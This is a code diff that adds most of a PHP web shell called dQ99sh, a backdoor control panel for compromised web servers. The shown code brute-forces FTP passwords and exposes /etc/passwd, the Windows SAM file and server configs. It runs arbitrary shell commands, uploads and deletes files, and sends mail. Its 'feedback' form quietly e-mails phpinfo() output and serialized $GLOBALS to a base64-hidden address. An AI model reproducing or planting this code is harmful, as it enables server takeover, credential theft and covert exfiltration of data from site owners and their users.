+      $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
+      fclose($fqb_logfp);
+    }
+  }
+  else {
+    $logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
+         "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
+         "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
+         "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
+         "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
+  }
+  echo "</td></tr></table></center>";
+}
+}
+if ($act == "d") {
+  if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
+  else {
+    echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+    if (!$win) {
+      echo "<tr><td><b>Owner/Group</b></td><td> ";
+      $ow = posix_getpwuid(fileowner($d));
+      $gr = posix_getgrgid(filegroup($d));
+      $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+    }
+    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
+  }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();}
+if ($act == "security") {
+  echo "<div class=barheader>.: Server Security Information :.</div>\n".
+       "<table>\n".
+       "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>\n";
+  echo "<td>Password File</td><td>";
+  if (!$win) {
+    if ($nixpasswd) {
+      if ($nixpasswd == 1) {$nixpasswd = 0;}
+      echo "*nix /etc/passwd:<br>";
+      if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+      if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+      echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+      $i = $nixpwd_s;
+      while ($i < $nixpwd_e) {
+        $uid = posix_getpwuid($i);
+        if ($uid) {
+          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+          echo join(":",$uid)."<br>";
+        }
+        $i++;
+      }
+    }
+    else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>Download /etc/passwd</b></a>";}
+  }
+  else {
+    $v = $_SERVER["WINDIR"]."\repair\sam";
+    if (!file_get_contents($v)) { echo "<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>"; }
+  }
+  echo "</td></tr>\n";
+  echo "<tr><td>Config Files</td><td>\n";
+  if (!$win) {
+    $v = array(
+        array("User Domains","/etc/userdomains"),
+        array("Cpanel Config","/var/cpanel/accounting.log"),
+        array("Apache Config","/usr/local/apache/conf/httpd.conf"),
+        array("Apache Config","/etc/httpd.conf"),
+        array("Syslog Config","/etc/syslog.conf"),
+        array("Message of The Day","/etc/motd"),
+        array("Hosts","/etc/hosts")
+    );
+    $sep = "/";
+  }
+  else {
+    $windir = $_SERVER["WINDIR"];
+    $etcdir = $windir . "\system32\drivers\etc\\";
+    $v = array(
+        array("Hosts",$etcdir."hosts"),
+        array("Local Network Map",$etcdir."networks"),
+        array("LM Hosts",$etcdir."lmhosts.sam"),
+    );
+    $sep = "\\";
+  }
+  foreach ($v as $sec_arr) {
+    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
+    $sec_d = rtrim($sec_arr[1],$sec_f);
+    $sec_full = $sec_d.$sec_f;
+    $sec_d = rtrim($sec_d,$sep);
+    if (file_get_contents($sec_full)) {
+      echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ] \n";
+    }
+  }
+  echo "</td></tr>";
+
+  function displaysecinfo($name,$value) {
+    if (!empty($value)) {
+      echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>\n";
+    }
+  }
+  if (!$win) {
+    displaysecinfo("OS Version",dQ99exec("cat /proc/version"));
+    displaysecinfo("Kernel Version",dQ99exec("sysctl -a | grep version"));
+    displaysecinfo("Distrib Name",dQ99exec("cat /etc/issue.net"));
+    displaysecinfo("Distrib Name (2)",dQ99exec("cat /etc/*-realise"));
+    displaysecinfo("CPU Info",dQ99exec("cat /proc/cpuinfo"));
+    displaysecinfo("RAM",dQ99exec("free -m"));
+    displaysecinfo("HDD Space",dQ99exec("df -h"));
+    displaysecinfo("List of Attributes",dQ99exec("lsattr -a"));
+    displaysecinfo("Mount Options",dQ99exec("cat /etc/fstab"));
+    displaysecinfo("lynx installed?",dQ99exec("which lynx"));
+    displaysecinfo("links installed?",dQ99exec("which links"));
+    displaysecinfo("GET installed?",dQ99exec("which GET"));
+    displaysecinfo("Where is Apache?",dQ99exec("whereis apache"));
+    displaysecinfo("Where is perl?",dQ99exec("whereis perl"));
+    displaysecinfo("Locate proftpd.conf",dQ99exec("locate proftpd.conf"));
+    displaysecinfo("Locate httpd.conf",dQ99exec("locate httpd.conf"));
+    displaysecinfo("Locate my.conf",dQ99exec("locate my.conf"));
+    displaysecinfo("Locate psybnc.conf",dQ99exec("locate psybnc.conf"));
+  }
+  else {
+    displaysecinfo("OS Version",dQ99exec("ver"));
+    displaysecinfo("Account Settings",dQ99exec("net accounts"));
+    displaysecinfo("User Accounts",dQ99exec("net user"));
+  }
+  echo "</table>\n";
+}
+if ($act == "mkfile") {
+  if ($mkfile != $d) {
+    if ($overwrite == 0) {
+      if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
+    }
+    else {
+      if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
+      else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
+    }
+  }
+  else { echo "<div class=dQerrmsg>Enter filename!</div>\r\n"; }
+}
+if ($act == "encoder") {
+echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
+     "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
+     "<input type=hidden name=act value=encoder>".
+     "<center><table class=contents>".
+     "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
+     "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
+     "<input type=submit value=\"calculate\"></td></tr>".
+     "<tr><td rowspan=4>Hashes:</td>";
+foreach(array("md5","crypt","sha1","crc32") as $v) {
+  echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
+}
+echo "</tr>".
+     "<tr><td rowspan=2>Url:</td>".
+     "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
+     "<tr><td rowspan=2>Base64:</td>".
+     "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>base64_decode:</td><td>";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
+else {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
+  else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
+}
+echo "</td></tr>".
+     "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++) {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly></td></tr></table></center></form>";
+}
+if ($act == "fsbuff") {
+  $arr_copy = $sess_data["copy"];
+  $arr_cut = $sess_data["cut"];
+  $arr = array_merge($arr_copy,$arr_cut);
+  if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
+  else {
+    $dQ_infohead = "File-System Buffer";
+    $ls_arr = $arr;
+    $disp_fullpath = TRUE;
+    $act = "ls";
+  }
+}
+if ($act == "selfremove") {
+  if (($submit == $rndcode) and ($submit != "")) {
+    if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name."!"; dQ99shexit(); }
+    else { echo "<center><b>Can't delete ".__FILE__."!</b></center>"; }
+  }
+  else {
+    if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
+    $rnd = rand(0,9).rand(0,9).rand(0,9);
+    echo "<form action=\"".$surl."\">\n".
+         "<input type=hidden name=act value=selfremove>".
+         "<input type=hidden name=rndcode value=\"".$rnd."\">".
+         "<b>Kill-shell: ".__FILE__." <br>".
+         "<b>Are you sure? For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=text name=submit>&nbsp;<input type=submit value=\"YES\">\n".
+         "</form>\n";
+  }
+}
+if ($act == "update") {
+  $ret = dQ99sh_getupdate(!!$confirmupdate);
+  echo "<b>".$ret."</b>";
+  if (stristr($ret,"new version")) {
+    echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
+  }
+}
+if ($act == "feedback") {
+  $suppmail = base64_decode("ZGhpZXF3ZWJtYXJrZXJAeWFob28uY29t");
+  if (!empty($submit)){
+    $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+    $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+    if (!empty($fdbk_ref)) {
+      $tmp = @ob_get_contents();
+      ob_clean();
+      phpinfo();
+      $phpinfo = base64_encode(ob_get_contents());
+      ob_clean();
+      echo $tmp;
+      $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+    }
+    mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
+    echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=feedback>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
+         "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
+         "*Language: English, Indonesian.</td></tr>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "dQmailer") {
+  if (!empty($submit)){
+    $headers = 'To: '.$dest_email."\r\n";
+    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
+    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
+      echo "<center><b>Email sent!</b></center>";
+    }
+    else { echo "<center><b>Can't send email!</b></center>"; }
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=dQmailer>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: $sh_name Mailer :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
+         "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
+         "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "search") {
+  echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
+  if (empty($search_in)) {$search_in = $d;}
+  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+  if (!empty($submit)) {
+    $found = array();
+    $found_d = 0;
+    $found_f = 0;
+    $search_i_f = 0;
+    $search_i_d = 0;
+    $a = array(
+        "name"=>$search_name,
+        "name_regexp"=>$search_name_regexp,
+        "text"=>$search_text,
+        "text_regexp"=>$search_text_regxp,
+        "text_wwo"=>$search_text_wwo,
+        "text_cs"=>$search_text_cs,
+        "text_not"=>$search_text_not
+    );
+    $searchtime = getmicrotime();
+    $in = array_unique(explode(";",$search_in));
+    foreach($in as $v) {dQ99fsearch($v);}
+    $searchtime = round(getmicrotime()-$searchtime,4);
+    if (count($found) == 0) {echo "No files found!";}
+    else {
+      $ls_arr = $found;
+      $disp_fullpath = TRUE;
+      $act = "ls";
+    }
+  }
+  echo "<table class=contents>".
+       "<tr><td><form method=POST>".
+       "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
+       "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
+       "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
+       "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
+       "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
+       "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
+       "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
+       "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
+       "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
+       "</table>\n";
+  if ($act == "ls") {
+    $dspact = $act;
+    echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
+         "<hr size=\"1\" noshade>";
+  }
+}
+if ($act == "chmod") {
+  $mode = fileperms($d.$f);
+  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+  else {
+    $form = TRUE;
+    if ($chmod_submit) {
+      $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+      if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
+      else {$err = "Can't chmod to ".$octet.".";}
+    }
+    if ($form) {
+      $perms = parse_perms($mode);
+      echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+    }
+  }
+}
+if ($act == "upload") {
+  $uploadmess = "";
+  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+  if (empty($uploadpath)) {$uploadpath = $d;}
+  elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
+  if (!empty($submit)) {
+    global $_FILES;
+    $uploadfile = $_FILES["uploadfile"];
+    if (!empty($uploadfile["tmp_name"])) {
+      if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+      else {$destin = $userfilename;}
+      if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
+        $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
+      }
+      else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
+    }
+    else { echo "No file to upload!"; }
+  }
+  if ($miniform) {
+    echo "<b>".$uploadmess."</b>";
+    $act = "ls";
+  }
+  else {
+    echo "<table><tr><td colspan=2 class=barheader>".
+         ".: File Upload :.</td>".
+         "<td colspan=2>".$uploadmess."</td></tr>".
+         "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
+         "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
+         "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
+         "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
+         "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
+         "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
+         "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
+         "</form></td></tr></table>";
+  }
+}
+if ($act == "delete") {
+  $delerr = "";
+  foreach ($actbox as $v) {
+    $result = FALSE;
+    $result = fs_rmobj($v);
+    if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
+  }
+  if (!empty($delerr)) { echo "<b>Error deleting:</b><br>".$delerr; }
+  $act = "ls";
+}
+if (!$usefsbuff) {
+  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {
+    echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";
+  }
+}
+else {
+  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); dQ99_sess_put($sess_data); $act = "ls"; }
+  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); dQ99_sess_put($sess_data); $act = "ls";}
+  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} dQ99_sess_put($sess_data); $act = "ls";}
+  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); dQ99_sess_put($sess_data);}
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+  elseif ($actarcbuff) {
+    $arcerr = "";
+    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+    else {$ext = ".tar.gz";}
+    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+    $cmdline .= " ".$actarcbuff_path;
+    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+    foreach($objects as $v) {
+      $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+      if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+      if (is_dir($v)) {
+        if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+        $v .= "*";
+      }
+      $cmdline .= " ".$v;
+    }
+    $tmp = realpath(".");
+    chdir($d);
+    $ret = dQ99exec($cmdline);
+    chdir($tmp);
+    if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+    $ret = str_replace("\r\n","\n",$ret);
+    $ret = explode("\n",$ret);
+    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+    foreach($sess_data["cut"] as $k=>$v) {
+      if (in_array($v,$ret)) {fs_rmobj($v);}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+    $act = "ls";
+  }
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    dQ99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Error pasting:</b><br>".$psterr;}
+    $act = "ls";
+  }
+}
+if ($act == "cmd") {
+  @chdir($chdir);
+  if (!empty($submit)) {
+    echo "<div class=barheader>.: Results of Execution :.</div>\n";
+    $olddir = realpath(".");
+    @chdir($d);
+    $ret = dQ99exec($cmd);
+    $ret = convert_cyr_string($ret,"d","w");
+    if ($cmd_txt) {
+      $rows = count(explode("\n",$ret))+1;
+      if ($rows < 10) { $rows = 10; } else { $rows = 30; }
+      $cols = 130;
+      echo "<textarea class=shell cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
+      //echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
+    }
+    else { echo $ret."<br>"; }
+    @chdir($olddir);
+  }
+}
+if ($act == "ls") {
+  if (count($ls_arr) > 0) { $list = $ls_arr; }
+  else {
+    $list = array();
+    if ($h = @opendir($d)) {
+      while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+      closedir($h);
+    }
+  }
+  if (count($list) == 0) { echo "<div class=dQerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
+  else {
+    $objects = array();
+    $vd = "f"; //Viewing mode
+    if ($vd == "f") {
+      $objects["head"] = array();
+      $objects["folders"] = array();
+      $objects["links"] = array();
+      $objects["files"] = array();
+      foreach ($list as $v) {
+        $o = basename($v);
+        $row = array();
+        if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
+        elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
+        elseif (is_dir($v)) {
+          if (is_link($v)) {$type = "LINK";}
+          else {$type = "DIR";}
+          $row[] = $v;
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+        $row[] = filemtime($v);
+        if (!$win) {
+          $ow = posix_getpwuid(fileowner($v));
+          $gr = posix_getgrgid(filegroup($v));
+          $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+        }
+        $row[] = fileperms($v);
+        if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+        elseif (is_link($v)) {$objects["links"][] = $row;}
+        elseif (is_dir($v)) {$objects["folders"][] = $row;}
+        elseif (is_file($v)) {$objects["files"][] = $row;}
+        $i++;
+      }
+      $row = array();
+      $row[] = "<b>Name</b>";
+      $row[] = "<b>Size</b>";
+      $row[] = "<b>Date Modified</b>";
+      if (!$win) {$row[] = "<b>Owner/Group</b>";}
+      $row[] = "<b>Perms</b>";
+      $row[] = "<b>Action</b>";
+      $parsesort = parsesort($sort);
+      $sort = $parsesort[0].$parsesort[1];
+      $k = $parsesort[0];
+      if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+      $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+      $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+      $row[$k] .= $y;
+      for($i=0;$i<count($row)-1;$i++) {
+        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+      }
+      $v = $parsesort[0];
+      usort($objects["folders"], "tabsort");
+      usort($objects["links"], "tabsort");
+      usort($objects["files"], "tabsort");
+      if ($parsesort[1] == "d") {
